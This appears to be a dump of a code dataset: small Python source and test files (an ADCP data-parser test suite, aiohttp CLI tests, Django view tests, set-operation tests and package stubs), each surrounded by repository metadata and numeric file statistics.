| 25.2 | 33 | 0.84127 | 20 | 126 | 5.1 | 0.35 | 0.294118 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.126984 | 126 | 4 | 34 | 31.5 | 0.927273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e714c59700ee301507e6458768955f51f29535b8 | 45 | py | Python | rpyc_mem/session/__init__.py | m0hithreddy/rpyc-mem | 72e46da34fe2165a89d702a02ec0bb7b6d64775e | [
"MIT"
] | 1 | 2022-03-12T23:29:13.000Z | 2022-03-12T23:29:13.000Z | rpyc_mem/session/__init__.py | m0hithreddy/rpyc-mem | 72e46da34fe2165a89d702a02ec0bb7b6d64775e | [
"MIT"
] | null | null | null | rpyc_mem/session/__init__.py | m0hithreddy/rpyc-mem | 72e46da34fe2165a89d702a02ec0bb7b6d64775e | [
"MIT"
] | null | null | null | from .rpyc_mem_session import RpycMemSession
| 22.5 | 44 | 0.888889 | 6 | 45 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 45 | 1 | 45 | 45 | 0.926829 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e72a7cdd88b2fa4cd4bdcba1d02c059ff6bc9c4e | 206 | py | Python | command.py | synsis/m3u8_downloader | 7c7fb3b7230051b92102d8c3f786f1d0194c3260 | [
"MIT"
] | 4 | 2019-03-12T10:07:52.000Z | 2021-02-20T19:21:43.000Z | command.py | synsis/m3u8_downloader | 7c7fb3b7230051b92102d8c3f786f1d0194c3260 | [
"MIT"
] | 1 | 2019-06-23T04:00:38.000Z | 2019-06-23T04:00:38.000Z | command.py | synsis/m3u8_downloader | 7c7fb3b7230051b92102d8c3f786f1d0194c3260 | [
"MIT"
] | 2 | 2019-03-30T20:20:30.000Z | 2020-07-04T12:50:42.000Z | import os
os.system("pip uninstall m3u8-video-downloader")
os.system("python setup.py sdist")
#os.system("python setup.py install")
# os.system("m3u8-video-downloader")
# os.system("twine upload dist/*")
| 22.888889 | 48 | 0.73301 | 31 | 206 | 4.870968 | 0.516129 | 0.264901 | 0.251656 | 0.278146 | 0.582781 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02139 | 0.092233 | 206 | 8 | 49 | 25.75 | 0.786096 | 0.504854 | 0 | 0 | 0 | 0 | 0.565657 | 0.212121 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
e74b108e20c7bc84a9c0232dfebf64faec5d1b27 | 12,103 | py | Python | mi/dataset/parser/test/test_adcps_jln_stc.py | ronkyo/mi-dataset | 5ee2d3a5b66c17500e5f7f1b3e4ba7a996a34c45 | [
"BSD-2-Clause"
] | null | null | null | mi/dataset/parser/test/test_adcps_jln_stc.py | ronkyo/mi-dataset | 5ee2d3a5b66c17500e5f7f1b3e4ba7a996a34c45 | [
"BSD-2-Clause"
] | null | null | null | mi/dataset/parser/test/test_adcps_jln_stc.py | ronkyo/mi-dataset | 5ee2d3a5b66c17500e5f7f1b3e4ba7a996a34c45 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_adcps_jln_stc
@file marine-integrations/mi/dataset/parser/test/test_adcps_jln_stc.py
@author Maria Lutz
@brief Test code for a adcps_jln_stc data parser
"""
import os
from nose.plugins.attrib import attr
from mi.core.exceptions import SampleException
from mi.core.log import get_logger
log = get_logger()
from mi.idk.config import Config
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.adcps_jln_stc import AdcpsJlnStcParser, \
AdcpsJlnStcInstrumentTelemeteredDataParticle, \
AdcpsJlnStcInstrumentRecoveredDataParticle, \
AdcpsJlnStcMetadataTelemeteredDataParticle, \
AdcpsJlnStcMetadataRecoveredDataParticle, \
AdcpsJlnStcParticleClassKey
RESOURCE_PATH = os.path.join(Config().base_dir(), 'mi',
'dataset', 'driver', 'adcps_jln',
'stc', 'resource')
@attr('UNIT', group='mi')
class AdcpsJlnStcParserUnitTestCase(ParserUnitTestCase):
"""
adcps_jln_stc Parser unit test suite
"""
def setUp(self):
ParserUnitTestCase.setUp(self)
self._telem_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.adcps_jln_stc',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
AdcpsJlnStcParticleClassKey.METADATA_PARTICLE_CLASS:
AdcpsJlnStcMetadataTelemeteredDataParticle,
AdcpsJlnStcParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
AdcpsJlnStcInstrumentTelemeteredDataParticle,
}
}
self._recov_config = {
DataSetDriverConfigKeys.PARTICLE_MODULE: 'mi.dataset.parser.adcps_jln_stc',
DataSetDriverConfigKeys.PARTICLE_CLASS: None,
DataSetDriverConfigKeys.PARTICLE_CLASSES_DICT: {
AdcpsJlnStcParticleClassKey.METADATA_PARTICLE_CLASS:
AdcpsJlnStcMetadataRecoveredDataParticle,
AdcpsJlnStcParticleClassKey.INSTRUMENT_PARTICLE_CLASS:
AdcpsJlnStcInstrumentRecoveredDataParticle,
}
}
def test_simple(self):
"""
Read test data and pull out multiple data particles at one time.
Assert that the results are those we expected.
"""
with open(os.path.join(RESOURCE_PATH, 'adcpt_20130929_091817.DAT')) as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(6)
self.assert_particles(result, 'adcpt_20130929_091817.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
with open(os.path.join(RESOURCE_PATH, 'adcpt_20130929_091817.DAT')) as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(6)
self.assert_particles(result, 'adcpt_20130929_091817.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
def test_bad_data_telem(self):
"""
Ensure that bad data is skipped when it exists.
"""
# Bad checksum
# If checksum is bad, skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_checksum.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_checksum.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 1)
self.assert_(isinstance(self.exception_callback_value[0], SampleException))
self.exception_callback_value.pop()
# Incorrect number of bytes
# If numbytes is incorrect, skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_num_bytes.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_num_bytes.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 1)
self.assert_(isinstance(self.exception_callback_value[0], SampleException))
def test_bad_data_recov(self):
"""
Ensure that bad data is skipped when it exists.
"""
# Bad checksum
# If checksum is bad, skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_checksum.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_checksum.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 1)
self.assert_(isinstance(self.exception_callback_value[0], SampleException))
self.exception_callback_value.pop()
# Incorrect number of bytes
# If numbytes is incorrect, skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_num_bytes.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_num_bytes.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 1)
self.assert_(isinstance(self.exception_callback_value[0], SampleException))
def test_receive_fail_telem(self):
# ReceiveFailure
# If record marked with 'ReceiveFailure', skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_rx_failure.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_rx_failure.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
def test_receive_fail_telem(self):
# ReceiveFailure
# If record marked with 'ReceiveFailure', skip the record and continue parsing.
with open(os.path.join(RESOURCE_PATH, 'adcps_jln_stc.bad_rx_failure.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(10)
self.assert_particles(result, 'adcps_jln_stc.bad_rx_failure.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
def test_real_file(self):
with open(os.path.join(RESOURCE_PATH, 'adcpt_20140504_015742.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(1000)
self.assert_particles(result, 'adcpt_20140504_015742.telem.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
with open(os.path.join(RESOURCE_PATH, 'adcpt_20140504_015742.DAT'), 'r') as file_handle:
parser = AdcpsJlnStcParser(self._recov_config,
None, file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(1000)
self.assert_particles(result, 'adcpt_20140504_015742.recov.yml', RESOURCE_PATH)
self.assertEquals(len(self.exception_callback_value), 0)
def test_bug_2979_1(self):
"""
Read test data and pull out multiple data particles at one time.
Assert that the results are those we expected.
"""
with open(os.path.join(RESOURCE_PATH, 'adcpt_20140613_105345.DAT')) as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(100)
self.assertEquals(len(result), 13)
self.assertEquals(len(self.exception_callback_value), 0)
def test_bug_2979_2(self):
"""
Read test data and pull out multiple data particles at one time.
Assert that the results are those we expected.
"""
with open(os.path.join(RESOURCE_PATH, 'adcpt_20140707_200310.DAT')) as file_handle:
parser = AdcpsJlnStcParser(self._telem_config,
None,
file_handle,
lambda state, ingested: None,
lambda data: None,
self.exception_callback)
result = parser.get_records(100)
self.assertEquals(len(result), 0)
self.assertEquals(len(self.exception_callback_value), 0)
| 43.851449 | 104 | 0.557217 | 1,137 | 12,103 | 5.692172 | 0.133685 | 0.06026 | 0.097342 | 0.072312 | 0.822775 | 0.822775 | 0.818758 | 0.818758 | 0.801143 | 0.801143 | 0 | 0.025945 | 0.372635 | 12,103 | 275 | 105 | 44.010909 | 0.826419 | 0.098075 | 0 | 0.7 | 0 | 0 | 0.075769 | 0.071087 | 0 | 0 | 0 | 0 | 0.164706 | 1 | 0.052941 | false | 0 | 0.047059 | 0 | 0.105882 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
99b7c52aef78481e5522b15a1f211a4f714489d7 | 3,367 | py | Python | tests/test_web_cli.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | 1 | 2021-07-07T06:36:57.000Z | 2021-07-07T06:36:57.000Z | tests/test_web_cli.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | null | null | null | tests/test_web_cli.py | ajdavis/aiohttp | d5138978f3e82aa82a2f003b00d38112c58a40c1 | [
"Apache-2.0"
] | 1 | 2021-02-09T10:05:59.000Z | 2021-02-09T10:05:59.000Z | import pytest
from aiohttp import web
from unittest import mock
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_empty(error):
argv = [""]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"'entry-func' not in 'module:function' syntax"
)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_only_module(error):
argv = ["test"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"'entry-func' not in 'module:function' syntax"
)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_only_function(error):
argv = [":test"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"'entry-func' not in 'module:function' syntax"
)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_only_seperator(error):
argv = [":"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"'entry-func' not in 'module:function' syntax"
)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_relative_module(error):
argv = [".a.b:c"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with("relative module names not supported")
@mock.patch("aiohttp.web.import_module", side_effect=ImportError)
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_non_existent_module(error, import_module):
argv = ["alpha.beta:func"]
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with("module %r not found" % "alpha.beta")
@mock.patch("aiohttp.web.import_module")
@mock.patch("aiohttp.web.ArgumentParser.error", side_effect=SystemExit)
def test_entry_func_non_existent_attribute(error, import_module):
argv = ["alpha.beta:func"]
module = import_module("alpha.beta")
del module.func
with pytest.raises(SystemExit):
web.main(argv)
error.assert_called_with(
"module %r has no attribute %r" % ("alpha.beta", "func")
)
@mock.patch("aiohttp.web.run_app")
@mock.patch("aiohttp.web.import_module")
def test_entry_func_call(import_module, run_app):
argv = ("-H testhost -P 6666 --extra-optional-eins alpha.beta:func "
"--extra-optional-zwei extra positional args").split()
module = import_module("alpha.beta")
with pytest.raises(SystemExit):
web.main(argv)
module.func.assert_called_with(
("--extra-optional-eins --extra-optional-zwei extra positional "
"args").split()
)
@mock.patch("aiohttp.web.run_app")
@mock.patch("aiohttp.web.import_module")
@mock.patch("aiohttp.web.ArgumentParser.exit", side_effect=SystemExit)
def test_running_application(exit, import_module, run_app):
argv = ("-H testhost -P 6666 --extra-optional-eins alpha.beta:func "
"--extra-optional-zwei extra positional args").split()
module = import_module("alpha.beta")
app = module.func()
with pytest.raises(SystemExit):
web.main(argv)
run_app.assert_called_with(app, host="testhost", port=6666)
exit.assert_called_with(message="Stopped\n")
| 27.598361 | 72 | 0.700327 | 439 | 3,367 | 5.191344 | 0.159453 | 0.055287 | 0.098289 | 0.116718 | 0.826678 | 0.802984 | 0.789381 | 0.727073 | 0.727073 | 0.703817 | 0 | 0.004264 | 0.164241 | 3,367 | 121 | 73 | 27.826446 | 0.805615 | 0 | 0 | 0.578313 | 0 | 0 | 0.307692 | 0.142857 | 0 | 0 | 0 | 0 | 0.120482 | 1 | 0.108434 | false | 0 | 0.168675 | 0 | 0.277108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
823d3e389e32bf46445c9861aae80fa71d4494c5 | 2,113 | py | Python | misclientes/tests.py | mrbrazzi/django-misclientes | 8017cc67e243e4384c3f52ae73d06e16f8fb8d5b | [
"Apache-2.0"
] | 5 | 2019-11-12T20:35:37.000Z | 2022-03-11T15:02:48.000Z | misclientes/tests.py | mrbrazzi/django-misclientes | 8017cc67e243e4384c3f52ae73d06e16f8fb8d5b | [
"Apache-2.0"
] | 4 | 2019-11-11T15:33:42.000Z | 2022-01-13T01:50:23.000Z | misclientes/tests.py | mrbrazzi/django-misclientes | 8017cc67e243e4384c3f52ae73d06e16f8fb8d5b | [
"Apache-2.0"
] | 4 | 2019-11-11T16:13:20.000Z | 2020-04-02T18:32:06.000Z | from django.test import TestCase
from .models import Enterprise
# Create your tests here.
from django.contrib.auth.models import AnonymousUser, User
from django.test import RequestFactory, TestCase
from .views import index, deletemodel
class AuthTest(TestCase):
def setUp(self):
# Every test needs access to the request factory.
self.factory = RequestFactory()
self.user = User.objects.create_user(
username='jacob', email='jacob@…', password='top_secret')
def test_auth_index_view(self):
# Create an instance of a GET request.
request = self.factory.get('index')
# Recall that middleware are not supported. You can simulate a
# logged-in user by setting request.user manually.
request.user = self.user
# Or you can simulate an anonymous user by setting request.user to
# an AnonymousUser instance.
#request.user = AnonymousUser()
# Test my_view() as if it were deployed at /customer/details
response = index(request)
# Use this syntax for class-based views.
self.assertEqual(response.status_code, 200)
class DeleteModelTest(TestCase):
def setUp(self):
# Every test needs access to the request factory.
self.factory = RequestFactory()
self.user = User.objects.create_user(
username='jacob', email='jacob@…', password='top_secret')
def test_delete_model_view(self):
# Create an instance of a GET request.
request = self.factory.get('deletemodel/42')
# Recall that middleware are not supported. You can simulate a
# logged-in user by setting request.user manually.
#request.user = self.user
# Or you can simulate an anonymous user by setting request.user to
# an AnonymousUser instance.
request.user = AnonymousUser()
# Test my_view() as if it were deployed at /customer/details
response = deletemodel(request)
# Use this syntax for class-based views.
self.assertEqual(response.status_code, 200)
| 35.216667 | 74 | 0.664931 | 265 | 2,113 | 5.271698 | 0.316981 | 0.062992 | 0.040086 | 0.057266 | 0.797423 | 0.797423 | 0.797423 | 0.797423 | 0.797423 | 0.797423 | 0 | 0.005089 | 0.256034 | 2,113 | 60 | 75 | 35.216667 | 0.879771 | 0.400852 | 0 | 0.4 | 0 | 0 | 0.050521 | 0 | 0 | 0 | 0 | 0 | 0.08 | 1 | 0.16 | false | 0.08 | 0.2 | 0 | 0.44 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
413b19012990114edf43266acce810e798a76153 | 133 | py | Python | flask_locate/main/__init__.py | abkfenris/flask-locate | d7295da6fbe65a5cd6047067bca07d9198954ec6 | [
"MIT"
] | null | null | null | flask_locate/main/__init__.py | abkfenris/flask-locate | d7295da6fbe65a5cd6047067bca07d9198954ec6 | [
"MIT"
] | null | null | null | flask_locate/main/__init__.py | abkfenris/flask-locate | d7295da6fbe65a5cd6047067bca07d9198954ec6 | [
"MIT"
] | null | null | null | """
Main public interface to the website
"""
from flask import Blueprint
main = Blueprint('main', __name__)
from . import (views)
| 13.3 | 36 | 0.714286 | 17 | 133 | 5.352941 | 0.705882 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172932 | 133 | 9 | 37 | 14.777778 | 0.827273 | 0.270677 | 0 | 0 | 0 | 0 | 0.044944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
41938f7e871cb62fb94c5c7176f259f3e317d02b | 1,475 | py | Python | test/unit/test_set.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 2,671 | 2015-01-03T08:23:25.000Z | 2022-03-31T06:15:48.000Z | test/unit/test_set.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 972 | 2015-01-05T08:11:00.000Z | 2022-03-29T13:47:15.000Z | test/unit/test_set.py | timmartin/skulpt | 2e3a3fbbaccc12baa29094a717ceec491a8a6750 | [
"MIT"
] | 845 | 2015-01-03T19:53:36.000Z | 2022-03-29T18:34:22.000Z | import sys
import unittest
import math
class SetTestCases(unittest.TestCase):
def test_or(self):
self.assertEqual(set('abcba') | set('cdc'), set('abcd'))
self.assertEqual(set('abcba') | set('efgfe'), set('abcefg'))
self.assertEqual(set('abcba') | set('ccb'), set('abc'))
self.assertEqual(set('abcba') | set('ef'), set('abcef'))
self.assertEqual(set('abcba') | set('ef') | set('fg'), set('abcefg'))
def test_and(self):
self.assertEqual(set('abcba') & set('cdc'), set('cc'))
self.assertEqual(set('abcba') & set('efgfe'), set(''))
self.assertEqual(set('abcba') & set('ccb'), set('bc'))
self.assertEqual(set('abcba') & set('ef'), set(''))
self.assertEqual(set('abcba') & set('cbcf') & set('bag'), set('b'))
def test_sub(self):
self.assertEqual(set('abcba') - set('cdc'), set('ab'))
self.assertEqual(set('abcba') - set('efgfe'), set('abc'))
self.assertEqual(set('abcba') - set('ccb'), set('a'))
self.assertEqual(set('abcba') - set('ef'), set('abc'))
self.assertEqual(set('abcba') - set('a') - set('b'), set('c'))
def test_xor(self):
self.assertEqual(set('abcba') ^ set('cdc'), set('abd'))
self.assertEqual(set('abcba') ^ set('efgfe'), set('abcefg'))
self.assertEqual(set('abcba') ^ set('ccb'), set('a'))
self.assertEqual(set('abcba') ^ set('ef'), set('abcef'))
if __name__ == '__main__':
unittest.main() | 43.382353 | 77 | 0.565424 | 187 | 1,475 | 4.395722 | 0.203209 | 0.346715 | 0.416058 | 0.53163 | 0.788321 | 0.788321 | 0.756691 | 0.517032 | 0.291971 | 0.291971 | 0 | 0 | 0.189153 | 1,475 | 34 | 78 | 43.382353 | 0.687291 | 0 | 0 | 0 | 0 | 0 | 0.150407 | 0 | 0 | 0 | 0 | 0 | 0.655172 | 1 | 0.137931 | false | 0 | 0.103448 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
68fee1a8fd61a5610b3d5d7cdc87c8fab385d1b5 | 91 | py | Python | h5Nastran/h5Nastran/post_process/result_readers/op2/__init__.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | [
"BSD-3-Clause"
] | 293 | 2015-03-22T20:22:01.000Z | 2022-03-14T20:28:24.000Z | h5Nastran/h5Nastran/post_process/result_readers/op2/__init__.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | [
"BSD-3-Clause"
] | 512 | 2015-03-14T18:39:27.000Z | 2022-03-31T16:15:43.000Z | h5Nastran/h5Nastran/post_process/result_readers/op2/__init__.py | ACea15/pyNastran | 5ffc37d784b52c882ea207f832bceb6b5eb0e6d4 | [
"BSD-3-Clause"
] | 136 | 2015-03-19T03:26:06.000Z | 2022-03-25T22:14:54.000Z | from __future__ import print_function, absolute_import
from ._op2_reader import OP2Reader
| 22.75 | 54 | 0.868132 | 12 | 91 | 5.916667 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024691 | 0.10989 | 91 | 3 | 55 | 30.333333 | 0.851852 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
ec1089c9a7a9e55875084c8662494be919188038 | 151 | py | Python | docker/django/restaurant/restapi/serializers/__init__.py | gitmehedi/cloudtuts | 3008b1cf7fbf22728c9bb2c059c4bd196043a93e | [
"Unlicense"
] | 3 | 2019-08-29T10:14:40.000Z | 2021-03-05T09:50:15.000Z | docker/django/restaurant/restapi/serializers/__init__.py | gitmehedi/cloudtuts | 3008b1cf7fbf22728c9bb2c059c4bd196043a93e | [
"Unlicense"
] | null | null | null | docker/django/restaurant/restapi/serializers/__init__.py | gitmehedi/cloudtuts | 3008b1cf7fbf22728c9bb2c059c4bd196043a93e | [
"Unlicense"
] | 1 | 2021-03-05T09:50:29.000Z | 2021-03-05T09:50:29.000Z | from .foodmenu_serializer import FoodMenuSerializer
from .restaurant_serializer import RestaurantSerializer
from .user_serializer import UserSerializer | 50.333333 | 55 | 0.907285 | 15 | 151 | 8.933333 | 0.6 | 0.358209 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.072848 | 151 | 3 | 56 | 50.333333 | 0.957143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
ec2b72c4754f283c4efaca71eca70932210ff3c0 | 96 | py | Python | venv/lib/python3.8/site-packages/aiohttp/formdata.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | null | null | null | venv/lib/python3.8/site-packages/aiohttp/formdata.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | null | null | null | venv/lib/python3.8/site-packages/aiohttp/formdata.py | Retraces/UkraineBot | 3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71 | [
"MIT"
] | null | null | null | /home/runner/.cache/pip/pool/50/9e/03/82a5f8264f8b6699ca39e38251ec0be76eb878ee03c873ca3a4e6f828b | 96 | 96 | 0.895833 | 9 | 96 | 9.555556 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.427083 | 0 | 96 | 1 | 96 | 96 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6b5cc43e89d7c5069c70484c8a992ce4d70fc52c | 71 | py | Python | multipay/gateways/paypal.py | sarathak/django-multipay | 27374f6de8b7c04f71145eaba5167e287dae6278 | [
"BSD-3-Clause"
] | null | null | null | multipay/gateways/paypal.py | sarathak/django-multipay | 27374f6de8b7c04f71145eaba5167e287dae6278 | [
"BSD-3-Clause"
] | 5 | 2021-03-18T23:31:58.000Z | 2021-09-22T18:32:59.000Z | multipay/gateways/paypal.py | sarathak/django-multipay | 27374f6de8b7c04f71145eaba5167e287dae6278 | [
"BSD-3-Clause"
] | null | null | null | from multipay.gateway import Gateway
class Paypal(Gateway):
pass
